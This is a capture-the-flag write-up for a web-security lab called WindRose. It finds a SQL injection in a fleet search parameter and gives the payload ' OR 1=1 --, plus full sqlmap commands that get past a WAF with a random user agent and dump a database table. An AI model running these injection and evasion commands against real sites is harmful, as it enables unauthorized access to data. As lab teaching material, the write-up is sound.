WindRose
WindRose Jet Charter's fleet browser was wired up by a contractor named Hugh during the 2014 rebrand and never revisited. Hugh's email address still bounces.
Room Description
https://dashboard.webverselabs-pro.com/events/windrose
Briefing
WindRose Jet Charter has been "boutique tailored aviation since 2009". Most of the site has aged well. The fleet browser, less so — it was wired up by a contractor named Hugh during the 2014 rebrand and never revisited. Hugh's email address still bounces.
Initial Analysis
We're back at it again for day 2 of the daily challenges on WebVerse. This time we have an aviation company to crack!
From the nav-bar we have the following endpoints:
<nav class="nav__links" aria-label="Primary">
<div class="nav__item ">
<a href="/about.php">About</a>
</div>
<div class="nav__item ">
<a href="/safety.php">Safety</a>
</div>
<div class="nav__item ">
<a href="/faqs.php">FAQs</a>
</div>
<div class="nav__item ">
<a href="/services.php">Services<span class="dropdown__caret">▾</span></a>
<div class="dropdown__panel" role="menu">
<a href="/services.php#private">Private Travel</a>
<a href="/services.php#corporate">Corporate Travel</a>
<a href="/services.php#government">Government & Defense</a>
<a href="/services.php#entertainment">Sports & Entertainment</a>
<div class="dropdown__panel-divider"></div>
<a href="/services.php#pricing">Pricing & rates</a>
</div>
</div>
<div class="nav__item ">
<a href="/fleet.php">Fleet<span class="dropdown__caret">▾</span></a>
<div class="dropdown__panel" role="menu">
<a href="/fleet.php?q=light">Light Jets</a>
<a href="/fleet.php?q=midsize">Midsize Jets</a>
<a href="/fleet.php?q=challenger">Super-Midsize</a>
<a href="/fleet.php?q=falcon">Heavy Jets</a>
<a href="/fleet.php?q=global">Long Range</a>
<a href="/fleet.php?q=g650">Ultra Long Range</a>
<div class="dropdown__panel-divider"></div>
<a href="/fleet.php">View entire fleet</a>
</div>
</div>
<div class="nav__item">
<a href="/about.php#bases">Bases<span class="dropdown__caret">▾</span></a>
<div class="dropdown__panel" role="menu">
<a href="/about.php#bases">KTEB · Teterboro</a>
<a href="/about.php#bases">KSNA · John Wayne</a>
<a href="/about.php#bases">KBOS · Boston Logan</a>
<a href="/about.php#bases">KASE · Aspen</a>
<a href="/about.php#bases">KAPA · Centennial</a>
<a href="/about.php#bases">KAUS · Austin-Bergstrom</a>
</div>
</div>
<div class="nav__item ">
<a href="/contact.php">Contact</a>
</div>
</nav>
Finding the bug
/about.php
This is just an informational page with static elements, nothing to be seen here, a bunch of explanation text for the company.
/safety.php
Same case here as the about section, just static text with the phone number there to report anything.
/faqs.php
There are so many questions here, this FAQ page seems more useful than production ready applications from major companies.
/services.php
There are 4 different types of services, but nothing to do here besides call the phone number.
/fleet.php
All signs point to fleet.php, here we can search aircrafts which means it is a perfect entry point for injection attacks. When we hover over Fleet it gives us a drop down list, and they are just pre-defined filters.
Light jets is just ?q=light.
https://e25f701b-3970-windrose-82f48.events.webverselabs-pro.com/fleet.php?q=
We have control over the q parameter, let's try to add a single quote and see if we get an error.
Alrighty, this doesn't tell us much currently, could be that there are no matches, and also SQL doesn't error out. Let's try to add a TRUE statement and see if all of aircrafts come back to us, if so, we have a confirmed injection point.
' OR 1=1 --
Exploitation
sqlmap -u "https://e715421f-3970-windrose-31036.events.webverselabs-pro.com/fleet.php?q=test"
-p q --batch --technique=B --banner --risk 3 --level 5
Unfortunately, this won't get us the results, as the website responds with Access denied, a 403 error when we try to run it just like this.
This means that our sqlmap requests are being blocked by the WAF or anything on the web application setup for protection, let's add a really useful switch: --random-agent, that will mask the user agent being sent along for the requests.
sqlmap -u "https://e715421f-3970-windrose-31036.events.webverselabs-pro.com/fleet.php?q=test" -p q --batch --technique=B --banner --risk 3 --level 5 --tables --dump --random-agent
Now we can continue with enumerating the tables, dumping data and what not because we have a confirmed way of automating this process, let's add on --tables and --dump to our command.
Hm, we are having slight issues with the information retrieval here, let's go ahead and listen to sqlmap and add --no-cast or --hex as a switch.
Unfortunately, that doesn't get us anywhere, I removed sqlmap's history and tried again and I got different table names, so we are messing something up along the way maybe. I restarted the machine and tried again, this time running both sqlmap and ghauri side by side for sanity checks, we know from the banner that the backend is SQLite and it can get funky.
Luckily, our previous command worked:
sqlmap -u "https://e25f701b-3970-windrose-82f48.events.webverselabs-pro.com/fleet.php?q=test" -p q --technique=B --batch --threads=1 --random-agent --tables --level 5 --risk 3
We have our table names, the experimental_jets table sounds a lot juicier than the other one.
So we need to craft our command to specifically target that table.
sqlmap -u "https://e25f701b-3970-windrose-82f48.events.webverselabs-pro.com/fleet.php?q=test" -p q --technique=B --batch --threads=1 --random-agent --tables --level 5 --risk 3 -T experimental_jets --dump
